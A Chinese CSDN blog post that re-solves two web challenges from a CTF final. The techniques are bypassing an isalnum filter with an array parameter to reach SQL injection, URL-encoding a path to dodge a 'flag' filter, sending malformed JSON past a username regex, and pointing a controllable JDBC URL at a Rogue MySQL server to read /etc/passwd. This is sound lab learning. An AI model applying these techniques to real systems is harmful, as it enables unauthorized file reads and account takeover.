长城杯线下赛赛后复现

最新推荐文章于 2024-04-25 21:58:08 发布
最新推荐文章于 2024-04-25 21:58:08 发布
阅读量1k 收藏 3
点赞数 3
分类专栏: ctfwp 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/120756272
版权

长城杯线下赛赛后复现

前言

去打了长城杯决赛,结果全程坐牢,果然不联网的web太难了,赛后拿到了两个web靶机的wp,复现一下。

fancyapi

目录结构

1634087522346.png

逻辑很简单,web用的是python的flask框架,然后go写了几个接口处理数据。

看看backend.go

func Flag(w http.ResponseWriter, r *http.Request ) {
	action:= r.URL.Query().Get("action")
	if action == "" {
		fail(w, "Error getting action")
		return
	}

	token:= r.URL.Query().Get("token")
	if token == "" {
		fail(w, "Error getting token")
		return
	}

	var secret string
	row := db.Sqlite.QueryRow("SELECT secret FROM token;")
	if err := row.Scan(&secret); err != nil {
		fail(w, "Error querying secret token")
		return
	}

	if action == "readFlag" && secret == token {
		data, err := ioutil.ReadFile("flag")
		if err != nil {
			fail(w, "Error reading flag")
			return
		}
		ok(w, fmt.Sprintf("Congrats this is your flag: %s", string(data)))
		return
	}
	ok(w, "Wrong token")
}

关键就在这里,action要readFlag,secrettoken,这个token的值是在数据库里的,再看

1634087643831.png

这里是可以造成sql注入的,注出token即可,但有个过滤,比赛时没有绕过去。。。然后基本上都在想办绕过这个过滤了。。

在app.py处

@app.route("/search", methods=["GET", "POST"])
def search():
   if request.method == "GET":
       return render_template("search.html")
   else:
       data = request.json
       if data['name']:
           if not isinstance(data['name'], str) or not data['name'].isalnum():
               return jsonify({"error": "Bad word detected"})
       if data['votes']:
           if not isinstance(data['votes'], int):
               return jsonify({"error": "Bad word detected"})
       r = requests.post(f"http://{server}/api/search", data=request.data)
       return jsonify(r.json())

/search路由的提交的数据传入go接口进行数据库查询,也就是上面sql注入的地方,提交方式为json。

vote参数为整数型,关键在name参数处有个isalnum。

绕过方法为多参数,但我比赛的时候尝试了多参数但是没有绕过去。后来拿到了wp,在本地简单复现一下。

搭建一个简单的app.py

from flask import Flask, request, jsonify

app = Flask(__name__)

@app.route("/search", methods=["GET", "POST"])
def search():
    if request.method == "GET":
        return "it is GET"
    else:
        data = request.json
        if data['name']:
            if not isinstance(data['name'], str) or not data['name'].isalnum():
                return jsonify({"error": "Bad word detected"})
        if data['votes']:
            if not isinstance(data['votes'], int):
                return jsonify({"error": "Bad word detected"})
        return "Legal data"

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)

因为isalnum的过滤只能提交字母和数字,如图

1634089479771.png

上面说了多参数,我只想到覆盖,看了wp用的是[]绕过

1634089598924.png

附上一张比赛时的原图(不是我做的)

1634089801686.png

这之后还有个过滤

@app.route("/<path:path>", methods=["GET"])
def handle(path):
    if 'flag' in unquote(path):
        action = request.args.get('action')
        token = request.args.get('token')
        print(action)
        if action == "readFlag":
            return jsonify({"error": "Sorry, readFlag is not permitted"})
        r = requests.get(f"http://{server}/{path}", params={
            "action": action,
            "token": token
        })
    else:
        r = requests.get(f"http://{server}/{path}")
    return jsonify(r.text)

要传入action="readFlag"但这里对readFlag有过滤

readFlag没法绕,这里是对路由进行绕过,这里判断当请求路径为/flag时才进行下面的判断,所以

%66lag?action=readFlag即可

比赛时觉得无解,现在看来学到了很多,还是太菜了

work

一道java题,比赛的时候知道了大致的思路,但没有做出来,赛后复现一下。

主办方后来给了jar包。所以本地复现比较容易。

直接看后台操作

1634099540002.png

主要是这里。

				String url = request.getParameter("url");
        String name = request.getParameter("name");
        String pwd = request.getParameter("pwd");
        ArrayList<UserBean> arrayList = new ArrayList<>();
        if(! (url.isEmpty() || name.isEmpty() || pwd.isEmpty())){
            JdbcUtils jdbcUtils = new JdbcUtils(url,name,pwd);
          ......
        }

这里jdbc参数全可控,搭建恶意mysql服务器读文件即可

但在做这个操作前需要登陆admin

看注册这里

package com.example.jdbcSer;

import com.alibaba.fastjson.JSON;
import org.springframework.web.bind.annotation.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

@RestController
public class Register {
    @GetMapping("/register")
    public boolean register(@RequestParam(value = "user", defaultValue = "{\"username\":\"hacker\",\"password\":\"guess\"}")String user) throws Exception {
        user = user.replace("'", "\"");
        Pattern pattern = Pattern.compile("\"username\":\"(.*?)\"");
        Matcher matcher = pattern.matcher(user);
        String username = "";
        while (matcher.find()){
            username =matcher.group();
        }
        if(!username.isEmpty()){
            user = user.replace(username, "\"username\":\"hacker\"");
        }

        UserBean o = JSON.parseObject(user, UserBean.class);
        JdbcUtils jdbcUtils = new JdbcUtils("jdbc:mysql://127.0.0.1:3306/www?serverTimezone=UTC", "root", "root");
        jdbcUtils.insert(o);
        return true;
    }
}

如果按照常规的json格式提交,不管什么username都会被替换成hacker

例如

{"username":"admin","password":"123456"}

1634100998896.png

注册成功,看看表里注册进了什么数据。

1634101057250.png

所以要绕过正则,这个正则很简单,用大小写或者畸形json数据即可,这里去掉双引号变成

{username:"admin","password":"123456"}

1634101169503.png

可以看到注册成功了。登陆

/login?data={username:"admin","password":"123456"}

登陆成功后来到admin。

先起恶意mysql服务器。

脚本地址

https://github.com/allyshka/Rogue-MySql-Server

启动脚本访问

http://127.0.0.1:8080/admin?url=jdbc:mysql://192.168.36.2:3306/www?serverTimezone=UTC&name=123&pwd=123

1634165197538.png

读到/etc/passwd 之后读flag就行。

这题应该还可以用jdbc反序列化,之后学了再来试试。

fmyyy1
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
2021微派种子杯创新性软件编程PK题1
08-03
一、大背景 二、大数据 三、评估方式
第一届长城杯部分wp(个人解题思路)
qq_74806534的博客
04-05 1202
访问蚁剑连接访问/var/www/html/u_c4nt_f1nd_flag.php。
第一届“长城杯”信息安全铁人三项(四场)部分题目wp
weixin_67961126的博客
04-02 756
首先看到流量分析的题目用wireshark,再导出http对象列表在zip对象中发现了files.zip。然后尝试暴力破解没有得到密码想着去分析一下文件用到的winhex。根据题目描述的提示结合之前没用到的key,des解码得到flag。就想着是不是还有别的加密----就想到了去检查一下是不是伪加密。发现这么多==是base64隐写,跑脚本得到。得到了key的值是66666666。是伪加密,改09为00。
2024长城杯铁人三项, Python代码分析题crypto WP
xingmiao0的博客
04-02 740
temp = (x * flag中的每个字符的十进制ascii码值 + y) % 251。
第一届长城杯 部分WP
mumuzi的博客
09-19 2497
平台没交WP,一是19名肯定进不了,二是步骤多懒得写,三是队里的密码????赶高铁去了。 签到 16进制的ascii+base64,手速是吧,直接一血。 flag{Welcome_to_changchengbe1} 你这flag保熟吗 前面不说了,两张图片尾部都有rar,提取出来一个hint和一个password的表格,hint给了16位的base64,加密之后和表格比较,发现 哦~,原来是希尔伯特曲线 观察和写脚本经历了长达1个多小时的斗争。 用希尔伯特曲线来提取此表格的脚本如下。(根据百度) fr
第一届“长城杯”信息安全铁人三项(第三区)部分题目wp
m0_74426634的博客
04-02 1234
第一届“长城杯”信息安全铁人三项(第三区)部分题目wp(会持续更新)
2019第十届蓝桥杯C\C++B组省赛后总结-附件资源
03-05
2019第十届蓝桥杯C\C++B组省赛后总结-附件资源
2023五一题发布
04-28
QQ群:261917685,届时会在QQ群里面费分享资料,点击链接加入群聊【A2023五一数学建模】:...
2018蓝桥杯省题题目
10-18
第九届蓝桥杯省题,源代码在另一篇资源,可以直接看我发的资源文件进行查找,任务书全部要求都已经实现。
第一届长城杯半决wp和AWD笔记
最新发布
qq_74806534的博客
04-25 1395
网站备份文件泄露可能造成的危害:1. 网站存在备份文件:网站存在备份文件,例如数据库备份文件、网站源码备份文件等,攻击者利用该信息可以更容易得到网站权限,导致网站被黑。2. 敏感文件泄露是高危漏洞之一,敏感文件包括数据库配置信息,网站后台路径,物理路径泄露等,此漏洞可以帮助攻击者进一步攻击,敞开系统的大门。3. 由于目标备份文件较大(xxx.G),可能存在更多敏感数据泄露4. 该备份文件被下载后,可以被用来做代码审计,进而造成更大的危害。
2024长城杯“-HTTPAttackFlow流量分析题(附题目)
xiaochaochao122的博客
04-01 337
pwd=wkur。
2024长城杯部分题解[crypto]
ljc13626678577的博客
04-01 826
你真的了解RSA吗,Problem两题wp
长城杯2021政企组-魔鬼凯撒的RC4茶室 WP
Sciurdae的博客
12-29 576
前面看起来像是RC4加密,结合题目一开始也以为是RC4,实际上并没有发现key。尝试之后,发现下面俩个加密实际都不重要。根据程序后面可以知道,flag片段里面的flag就是密文,拿密文和key异或可以得到前半段flag。有个小技巧,这里传入的参数是Str字符串,但是原本IDA自动识别出来的类型是。,所以直接看就是很多(BYTE *)类型转换,可以直接对a1按。输入1111122222为flag,动态调试。UPX壳,upx -d直接脱。这样就特别容易看了,其他题目同理。正确,也就得到了后半部分flag。
2024长城杯-第五场-流量分析wp
qq_67760645的博客
04-11 658
查看了一下流量包里的协议包,发现只有TLS协议进行了加密。使用冰蝎4.0自带的解密脚本进行解密,协议名称那里根据前面发现的代码判断出是xor+base64。先把这段数据放入冰蝎进行解密,然后把这个cmd变量的这段base64进行解码,发现将这段串数字输入到文件中,文件名带有passwd。得到了flag{Keep_going_jpg},但是这个flag是错误的。但是这个flag里面的内容就是图片的文件名+文件后缀。说明解题还是看这个图片。查看那个key文件,拖入十六进制查看工具发现这个是RSA加密的key。
2021 长城杯ctf wp
qq_45603443的博客
09-20 4660
2021 长城杯 wpMisc签到你这flag保熟吗Cryptobaby_rsaReverseJust_cmpfunny_jsWebjava_urlez_pythonPwnK1ng_in_h3Ap_IK1ng_in_h3Ap_II Misc 签到 ASCII—16进制—base64 你这flag保熟吗 下载附件,得到两张图⽚和⼀个压缩包,压缩包需要密码 从图⽚可以提取出两个rar 得到⼀个excel和⼀个hint hint中提示base64:(,还有⼀串不知所云的base64 excel中是分开来的单
2021长城杯pwn部分wp
eeeeeight的博客
09-19 5984
前言: 就, 除了vmpwn都是基础glibc的heap题 king_in_heap_1: delete函数没有把free后的指针置零, 存在uaf, 然后用unsortedbin的fd指向io结构体泄露libc, 然后mallochook上用realloc调整一下, 打onegadget就完事了 #!/usr/bin/env python # coding=utf-8 from pwn import * sh=remote('47.104.175.110',20066) #sh=process('./ki
2021 BugkuCTF长城杯“ ——“你这flag保熟吗“ 详解
Mutsa的博客
02-21 2127
废话:第一次参加CTF,啥也不会,去刷刷真题吧,刷到21年“长城杯”Misc题--“你这flag保熟吗”。下载解压,两张图片一个压缩包,解压要密码,像这种有压缩包要密码,还有图片或者其他文件的,直接不要去想暴力破解了。将图片分离得到一个passwor.xls和hint.txt。两个都打开了,看不出来啥,直接网上搜WP。好!搜来的题解看了,更加懵了,什么希尔伯特曲线,什么brainfuck(BF)密码,什么BF执行的栈,什么atbash密码。学了好久,记录一下。
泰迪杯数据分析技能
11-10
根据提供的引用内容,泰迪杯数据分析技能题主要涉及以下方面: 1. 分析销售和利润数据,编写分析报告。 2. 对产品销售和利润数据进行年度对比、类比、相关性等分析和预测,以识别趋势。 3. 基于分析和预测结果,设计一个大屏幕显示数据指标和可视化图表,以代表产品销售和利润情况。 因此,泰迪杯数据分析技能题需要选手具备以下技能: 1. 数据分析和报告撰写能力。 2. 数据分析和预测能力。 3. 数据可视化和大屏幕设计能力。 如果您想更深入了解泰迪杯数据分析技能题,可以参考以下问题:

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值